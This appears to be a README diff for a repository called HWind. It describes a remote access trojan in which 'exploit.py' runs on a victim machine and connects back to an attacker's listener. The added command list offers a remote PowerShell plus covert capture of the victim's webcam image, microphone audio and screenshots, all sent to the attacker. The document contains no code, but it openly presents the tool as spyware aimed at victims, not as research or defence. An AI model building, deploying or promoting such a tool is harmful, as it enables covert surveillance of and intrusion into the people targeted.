w0rk5107h/HWind/README.md

 `exploit.py` or `exploit.exe` needs to be executed on the victim machine.
 `listener.py` or `listener.exe` needs to be executed on the attacker machine.

+## Commands
+1. `shell`: This will open a powershell over the HWind shell.
+2. `image`: Click an image of the victim and send it to attacker.
+3. `audio`: Record the victim's audio and send it to the attacker.
+4. `screenshot`: Take a screenshot of the victim's machine and send to attacker.

+**More commands comming soon.**